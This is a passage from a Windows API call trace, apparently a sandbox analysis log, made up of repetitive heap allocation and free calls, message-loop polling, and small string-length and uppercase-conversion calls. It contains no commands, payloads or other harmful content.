hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef5c8 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef628 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef5f8 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef430 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef508 | out: hHeap=0x2af0000) returned 1 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef628 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef730 | out: hHeap=0x2af0000) returned 1 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e4c8 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef700 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723a8 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef700 | out: hHeap=0x2af0000) returned 1 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e428 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef910 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72598 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e298 [0084.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723b8 [0084.059] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e298 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef970 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a723c8 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef868 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72418 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723b8 [0084.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef700 [0084.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ef7d8 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e2c0 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef928 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72438 [0084.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef928 | out: hHeap=0x2af0000) returned 1 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e298 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef928 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0084.060] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724d8 [0084.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e3d8 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9d0 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efac0 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72418 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e400 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723b8 [0084.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e220 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e3d8 | out: hHeap=0x2af0000) returned 1 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9d0 | out: hHeap=0x2af0000) returned 1 [0084.061] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e248 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9d0 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723d8 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa30 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72428 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72428 | out: hHeap=0x2af0000) returned 1 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72428 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbf8 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72448 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efc10 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72448 | out: hHeap=0x2af0000) returned 1 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efc10 | out: hHeap=0x2af0000) returned 1 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbf8 | out: hHeap=0x2af0000) returned 1 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72428 | out: hHeap=0x2af0000) returned 1 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724d8 [0084.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0084.061] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72428 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72448 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efb08 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72458 [0084.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbf8 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efc10 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72468 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff58 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72468 | out: hHeap=0x2af0000) returned 1 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff70 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72468 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72468 | out: hHeap=0x2af0000) returned 1 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe98 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72468 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72468 | out: hHeap=0x2af0000) returned 1 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724d8 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efdc0 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff58 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efc10 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff70 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbf8 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72458 | out: hHeap=0x2af0000) returned 1 [0084.062] lstrlenW (lpString="20") returned 2 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efdc0 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efb08 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72448 | out: hHeap=0x2af0000) returned 1 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efb08 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbf8 [0084.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72448 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72428 | out: hHeap=0x2af0000) returned 1 [0084.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbf8 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72448 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efb08 | out: hHeap=0x2af0000) returned 1 [0084.063] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.063] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72428 [0084.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efc10 [0084.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72448 [0084.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0084.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efb08 [0084.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72458 [0084.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72468 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724d8 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72468 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efdc0 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbf8 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff70 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efdd8 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72458 | out: hHeap=0x2af0000) returned 1 [0084.063] lstrlenW (lpString="31") returned 2 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72468 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efec8 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efb08 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72448 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efc10 | out: hHeap=0x2af0000) returned 1 [0084.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72428 | out: hHeap=0x2af0000) returned 1 [0084.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efb08 | out: hHeap=0x2af0000) returned 1 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] lstrlenW (lpString="20") returned 2 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] lstrlenW (lpString="20") returned 2 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] lstrlenW (lpString="31") returned 2 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] lstrlenW (lpString="30") returned 2 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] lstrlenW (lpString="32") returned 2 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] lstrlenW (lpString="34") returned 2 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.064] lstrlenW (lpString="20") returned 2 [0084.064] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] lstrlenW (lpString="20") returned 2 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] lstrlenW (lpString="31") returned 2 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] lstrlenW (lpString="30") returned 2 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] lstrlenW (lpString="32") returned 2 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] lstrlenW (lpString="34") returned 2 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] lstrlenW (lpString="20") returned 2 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.065] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] lstrlenW (lpString="20") returned 2 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] lstrlenW (lpString="34") returned 2 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] lstrlenW (lpString="20") returned 2 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.066] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, 